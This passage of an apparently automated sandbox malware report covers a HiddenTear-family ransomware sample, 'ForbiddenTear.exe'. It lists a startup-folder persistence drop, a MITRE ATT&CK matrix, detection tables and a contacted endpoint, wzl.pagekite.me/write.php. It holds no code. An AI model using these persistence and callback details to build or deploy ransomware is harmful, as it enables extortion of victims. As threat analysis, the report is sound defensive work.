    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
    Source: C:\Users\user\Desktop\ForbiddenTear.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsWindows Management InstrumentationStartup Items1Startup Items1Masquerading111OS Credential DumpingSecurity Software Discovery11Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobRegistry Run Keys / Startup Folder121Process Injection12Disable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)LSASS Driver1Registry Run Keys / Startup Folder121Process Injection12Security Account ManagerRemote System Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)LSASS Driver1Obfuscated Files or Information1NTDSSystem Information Discovery13Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptFile Deletion1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 325968 Sample: ForbiddenTear.exe Startdate: 02/12/2020 Architecture: WINDOWS Score: 100 26 Antivirus detection for dropped file 2->26 28 Antivirus / Scanner detection for submitted sample 2->28 30 Multi AV Scanner detection for dropped file 2->30 32 6 other signatures 2->32 7 ForbiddenTear.exe 16 3 2->7         started        12 cdd.dll 2->12         started        14 sihost.exe 2->14         started        16 7 other processes 2->16 process3 dnsIp4 24 wzl.pagekite.me 95.216.167.199, 49709, 80 HETZNER-ASDE Germany 7->24 22 C:\Users\user\AppData\Roaming\...\servicesmc, PE32 7->22 dropped 34 Drops PE files to the startup folder 7->34 18 cmd.exe 1 7->18         started        file5 signatures6 process7 process8 20 conhost.exe 18->20         started       

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    ForbiddenTear.exe55%VirustotalBrowse
    ForbiddenTear.exe50%ReversingLabsByteCode-MSIL.Ransomware.HiddenTear
    ForbiddenTear.exe100%AviraHEUR/AGEN.1121252
    ForbiddenTear.exe100%Joe Sandbox ML

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmc100%AviraHEUR/AGEN.1121252
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmc100%Joe Sandbox ML
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmc50%ReversingLabsByteCode-MSIL.Ransomware.HiddenTear

    Unpacked PE Files

    SourceDetectionScannerLabelLinkDownload
    0.0.ForbiddenTear.exe.370000.0.unpack100%AviraHEUR/AGEN.1121252Download File
    0.2.ForbiddenTear.exe.370000.0.unpack100%AviraHEUR/AGEN.1121252Download File

    Domains

    SourceDetectionScannerLabelLink
    wzl.pagekite.me1%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://wzl.pagekite.me/write.php1%VirustotalBrowse
    http://wzl.pagekite.me/write.php0%Avira URL Cloudsafe
    http://www.jiyu-kobo.co.jp/lt0%VirustotalBrowse
    http://www.jiyu-kobo.co.jp/lt0%Avira URL Cloudsafe
    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
    http://wzl.pagekite.me/1%VirustotalBrowse
    http://wzl.pagekite.me/0%Avira URL Cloudsafe
    http://www.fontbureau.comd%0%Avira URL Cloudsafe
    http://www.namazu.org/0%Avira URL Cloudsafe
    http://www.tiro.com0%URL Reputationsafe
    http://www.tiro.com0%URL Reputationsafe
    http://www.tiro.com0%URL Reputationsafe
    http://www.goodfont.co.kr0%URL Reputationsafe
    http://www.goodfont.co.kr0%URL Reputationsafe
    http://www.goodfont.co.kr0%URL Reputationsafe
    http://www.xfa.org/schema/xdc/1.0/0%Avira URL Cloudsafe
    http://www.sajatypeworks.com0%URL Reputationsafe
    http://www.sajatypeworks.com0%URL Reputationsafe
    http://www.sajatypeworks.com0%URL Reputationsafe
    http://www.galapagosdesign.com/m0%Avira URL Cloudsafe
    http://www.typography.netD0%URL Reputationsafe
    http://www.typography.netD0%URL Reputationsafe
    http://www.typography.netD0%URL Reputationsafe
    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
    http://fontfabrik.com0%URL Reputationsafe
    http://fontfabrik.com0%URL Reputationsafe
    http://fontfabrik.com0%URL Reputationsafe
    https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Upload/Acceptapplication/vnd.adobe.skybo0%Avira URL Cloudsafe
    http://www.jiyu-kobo.co.jp/.0%Avira URL Cloudsafe
    http://www.jiyu-kobo.co.jp/te0%Avira URL Cloudsafe
    http://en.wq0%Avira URL Cloudsafe
    http://www.jiyu-kobo.co.jp/jp/m0%Avira URL Cloudsafe
    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
    http://www.sandoll.co.kr0%URL Reputationsafe
    http://www.sandoll.co.kr0%URL Reputationsafe
    http://www.sandoll.co.kr0%URL Reputationsafe
    http://www.urwpp.deDPlease0%URL Reputationsafe
    http://www.urwpp.deDPlease0%URL Reputationsafe
    http://www.urwpp.deDPlease0%URL Reputationsafe
    http://www.zhongyicts.com.cn0%URL Reputationsafe
    http://www.zhongyicts.com.cn0%URL Reputationsafe
    http://www.zhongyicts.com.cn0%URL Reputationsafe
    http://www.flexerasoftware.com00%Avira URL Cloudsafe
    http://www.sakkal.com0%URL Reputationsafe
    http://www.sakkal.com0%URL Reputationsafe
    http://www.sakkal.com0%URL Reputationsafe
    http://www.fontbureau.com.TTF0%URL Reputationsafe
    http://www.fontbureau.com.TTF0%URL Reputationsafe
    http://www.fontbureau.com.TTF0%URL Reputationsafe
    http://www.inform-fiction.org/0%Avira URL Cloudsafe
    http://www.fontbureau.comalsd0%Avira URL Cloudsafe
    http://www.galapagosdesign.com/0%URL Reputationsafe
    http://www.galapagosdesign.com/0%URL Reputationsafe
    http://www.galapagosdesign.com/0%URL Reputationsafe
    http://www.fontbureau.comF0%URL Reputationsafe
    http://www.fontbureau.comF0%URL Reputationsafe
    http://www.fontbureau.comF0%URL Reputationsafe
    http://www.jiyu-kobo.co.jp/R0%Avira URL Cloudsafe
    http://ocsp.thawte.com00%URL Reputationsafe
    http://ocsp.thawte.com00%URL Reputationsafe
    http://ocsp.thawte.com00%URL Reputationsafe
    http://www.djvuzone.org/0%Avira URL Cloudsafe
    http://www.jiyu-kobo.co.jp/I0%Avira URL Cloudsafe
    http://www.fontbureau.comcomm0%Avira URL Cloudsafe
    http://www.fontbureau.comtv0%Avira URL Cloudsafe
    http://www.jiyu-kobo.co.jp/vam0%Avira URL Cloudsafe
    http://www.fontbureau.comI.TTF.0%Avira URL Cloudsafe
    http://www.fontbureau.comL.TTF0%Avira URL Cloudsafe
    http://www.fontbureau.comcomd%0%Avira URL Cloudsafe
    http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
    http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
    http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
    http://www.fontbureau.coma0%URL Reputationsafe
    http://www.fontbureau.coma0%URL Reputationsafe
    http://www.fontbureau.coma0%URL Reputationsafe
    http://www.fontbureau.comd0%URL Reputationsafe
    http://www.fontbureau.comd0%URL Reputationsafe
    http://www.fontbureau.comd0%URL Reputationsafe
    http://www.websitetest.com/0%Avira URL Cloudsafe
    http://www.carterandcone.coml0%URL Reputationsafe
    http://www.carterandcone.coml0%URL Reputationsafe
    http://www.carterandcone.coml0%URL Reputationsafe
    http://www.founder.com.cn/cn.0%Avira URL Cloudsafe
    http://www.adrift.org.uk/)0%Avira URL Cloudsafe
    http://www.founder.com.cn/cn0%URL Reputationsafe
    http://www.founder.com.cn/cn0%URL Reputationsafe
    http://www.founder.com.cn/cn0%URL Reputationsafe
    http://www.jiyu-kobo.co.jp/v0%Avira URL Cloudsafe
    http://www.jiyu-kobo.co.jp/p0%URL Reputationsafe
    http://www.jiyu-kobo.co.jp/p0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    wzl.pagekite.me
    		95.216.167.199
    		truefalseunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://wzl.pagekite.me/write.phpfalse
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://www.jiyu-kobo.co.jp/ltForbiddenTear.exe, 00000000.00000003.213905669.00000000056D6000.00000004.00000001.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://www.fontbureau.com/designersGForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpfalse
      		high
      http://lists.gnupg.org/pipermail/gnupg-devel/1999-September/016052.htmlForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpfalse
        		high
        http://www.fontbureau.com/designers/?ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpfalse
          		high
          http://www.founder.com.cn/cn/bTheForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://wzl.pagekite.me/ForbiddenTear.exe, ForbiddenTear.exe, 00000000.00000002.245582108.00000000003DB000.00000002.00020000.sdmpfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://www.fontbureau.com/designers?ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpfalse
            		high
            https://pagekite.net/ForbiddenTear.exe, 00000000.00000002.246307583.0000000002760000.00000004.00000001.sdmpfalse
              		high
              http://schemas.xmlsoap.org/soap/envelope/ForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmpfalse
                		high
                http://www.fontbureau.com/designers/cabarga.htmlhtXForbiddenTear.exe, 00000000.00000003.216196286.0000000005716000.00000004.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.comd%ForbiddenTear.exe, 00000000.00000003.216316196.00000000056D6000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		low
                  http://www.namazu.org/ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.tiro.comForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designersForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpfalse
                    		high
                    http://schemas.xmlsoap.org/soap/encoding/:rootForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmpfalse
                      		high
                      http://www.goodfont.co.krForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.xfa.org/schema/xdc/1.0/ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://cex.ioForbiddenTear.exe, ForbiddenTear.exe, 00000000.00000002.245582108.00000000003DB000.00000002.00020000.sdmpfalse
                        		high
                        http://www.sajatypeworks.comForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.galapagosdesign.com/mForbiddenTear.exe, 00000000.00000003.217291955.00000000056D6000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.typography.netDForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.founder.com.cn/cn/cTheForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.galapagosdesign.com/staff/dennis.htmForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://fontfabrik.comForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://crl.thawte.com/ThawteTimestampingCA.crl0ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpfalse
                          		high
                          https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Upload/Acceptapplication/vnd.adobe.skyboForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          http://www.geocities.com/nevilo/mod.htm:ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpfalse
                            		high
                            http://www.jiyu-kobo.co.jp/.ForbiddenTear.exe, 00000000.00000003.213666391.00000000056D6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.jiyu-kobo.co.jp/teForbiddenTear.exe, 00000000.00000003.213905669.00000000056D6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://en.wqForbiddenTear.exe, 00000000.00000003.211174928.00000000056D5000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.jiyu-kobo.co.jp/jp/mForbiddenTear.exe, 00000000.00000003.213905669.00000000056D6000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.galapagosdesign.com/DPleaseForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://a9.com/-/spec/opensearchrss/1.0/:startIndexForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmpfalse
                              		high
                              http://www.fonts.comForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpfalse
                                		high
                                http://www.sandoll.co.krForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.urwpp.deDPleaseForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.zhongyicts.com.cnForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://a9.com/-/spec/opensearchrss/1.0/:totalResultsForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameForbiddenTear.exe, 00000000.00000002.246269907.0000000002711000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.flexerasoftware.com0ForbiddenTear.exe, 00000000.00000003.229575319.0000000003B6B000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.sakkal.comForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://pagekite.net/offline/?&amp;where=FE&amp;proto=http&amp;domain=wzl.pagekite.me&amp;relay=::ffForbiddenTear.exe, 00000000.00000002.246307583.0000000002760000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.fontbureau.com.TTFForbiddenTear.exe, 00000000.00000003.216656150.00000000056D6000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      https://blockchain.info/wallet/price-of-one-bitcoinForbiddenTear.exe, 00000000.00000002.245582108.00000000003DB000.00000002.00020000.sdmpfalse
                                        		high
                                        http://www.inform-fiction.org/ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.fontbureau.comalsdForbiddenTear.exe, 00000000.00000003.216656150.00000000056D6000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://a9.com/-/spec/opensearchrss/1.0/:itemsPerPagehttp://a9.com/-/spec/opensearchrss/1.0/:startIndForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.apache.org/licenses/LICENSE-2.0ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.fontbureau.comForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.galapagosdesign.com/ForbiddenTear.exe, 00000000.00000003.217396511.00000000056D7000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.libpng.org/pub/mng/spec/ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.fontbureau.comFForbiddenTear.exe, 00000000.00000003.216656150.00000000056D6000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://schemas.xmlsoap.org/soap/encoding/ForbiddenTear.exe, 00000000.00000002.246269907.0000000002711000.00000004.00000001.sdmp, ForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.symauth.com/cps09ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.jiyu-kobo.co.jp/RForbiddenTear.exe, 00000000.00000003.213905669.00000000056D6000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://ocsp.thawte.com0ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.djvuzone.org/ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://gps.echosign.comForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://www.jiyu-kobo.co.jp/IForbiddenTear.exe, 00000000.00000003.213666391.00000000056D6000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.fontbureau.comcommForbiddenTear.exe, 00000000.00000002.247366333.00000000056D0000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.fontbureau.comtvForbiddenTear.exe, 00000000.00000002.247366333.00000000056D0000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.jiyu-kobo.co.jp/vamForbiddenTear.exe, 00000000.00000003.213436321.00000000056D6000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.fontbureau.comI.TTF.ForbiddenTear.exe, 00000000.00000002.247366333.00000000056D0000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.fontbureau.comL.TTFForbiddenTear.exe, 00000000.00000003.216656150.00000000056D6000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.fontbureau.comcomd%ForbiddenTear.exe, 00000000.00000003.216656150.00000000056D6000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		low
                                                      http://www.yahooapis.com/v1/base.rng:uriForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.jiyu-kobo.co.jp/jp/ForbiddenTear.exe, 00000000.00000003.213666391.00000000056D6000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.fontbureau.comaForbiddenTear.exe, 00000000.00000003.215534515.00000000056D6000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.symauth.com/cps0(ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://www.fontbureau.comdForbiddenTear.exe, 00000000.00000003.216656150.00000000056D6000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://btc-e.comForbiddenTear.exe, ForbiddenTear.exe, 00000000.00000002.245582108.00000000003DB000.00000002.00020000.sdmpfalse
                                                            		high
